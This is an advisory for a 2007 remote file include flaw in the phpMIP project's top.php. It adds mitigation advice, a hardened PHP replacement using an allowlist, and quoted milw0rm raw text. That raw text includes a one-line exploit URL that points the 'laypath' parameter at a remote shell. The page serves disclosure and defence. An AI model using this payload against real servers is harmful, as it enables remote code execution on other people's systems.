Author: GolD_M = [Mahmood_ali]
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Patch Exists: NO
Year: 2007

PHP Module Implementation Remote File Include Vulnerability

top.php passes the unvalidated 'laypath' request parameter straight into an include() call, so an attacker who controls that parameter can make the server include a remote file. Because the included file is executed as PHP, this can lead to remote code execution.

Mitigation:

Validate the layout name against a fixed allowlist before it reaches include(), and build the include path from a fixed absolute base directory on the server rather than from user-controlled input.
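As an added example, not part of the original advisory or of the phpMIP project's code: the vulnerable include pattern quoted in the advisory beside a hardened replacement that resolves the layout name against an allowlist and a fixed local directory. The `layouts/` directory layout and the allowlist entries are assumptions made for this example.

```php
<?php
// Vulnerable pattern, as quoted in the advisory (line 23 of top.php):
// $laypath comes straight from the request, so whatever string the
// client sends becomes the include target.
//
//   include("$laypath/body.php");
//
// Hardened replacement (added example). Assumptions: layouts live under
// ./layouts/<name>/body.php and the request parameter is still 'laypath'.

declare(strict_types=1);

const LAYOUT_BASE      = __DIR__ . '/layouts';
const ALLOWED_LAYOUTS  = ['default', 'compact'];   // constructed allowlist

/**
 * Resolve a user-supplied layout name to a file inside LAYOUT_BASE,
 * or return null if it is not an allowed, existing local layout.
 */
function resolveLayout(string $laypath): ?string
{
    // 1. Allowlist: only known layout names; no slashes, dots or URLs
    //    can ever pass this check, so traversal and remote URLs are out.
    if (!in_array($laypath, ALLOWED_LAYOUTS, true)) {
        return null;
    }
    // 2. Canonicalise and confirm the result still sits under LAYOUT_BASE
    //    (defence in depth in case the allowlist is later loosened).
    $candidate = realpath(LAYOUT_BASE . '/' . $laypath . '/body.php');
    $base      = realpath(LAYOUT_BASE);
    if ($candidate === false || $base === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

$requested = isset($_GET['laypath']) ? (string) $_GET['laypath'] : 'default';
$file = resolveLayout($requested);
if ($file === null) {
    http_response_code(400);
    exit('Unknown layout');
}
include $file;   // absolute local path, never user-controlled text
```

Pair the code change with `allow_url_include=Off` (and `register_globals=Off` on PHP versions that still have it) in php.ini, so that even an unfixed include() cannot fetch remote files.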

Exploit-DB raw data:

*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul   ^
**********************************************************************
**********************************************************************
Download S : http://sourceforge.net/projects/phpmip/                ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali]  &&  Contact: HackEr_@W.Cn           ^
**********************************************************************
**********************************************************************
In:  /[path]/top.php                                                ^
**********************************************************************
**********************************************************************
Vulnerable Code:                                                    ^
**********************************************************************
**********************************************************************
include("$laypath/body.php");    Line : 23                          ^
**********************************************************************
**********************************************************************
Exploit:                                                            ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell]                           ^
**********************************************************************
**********************************************************************

# milw0rm.com [2007-02-25]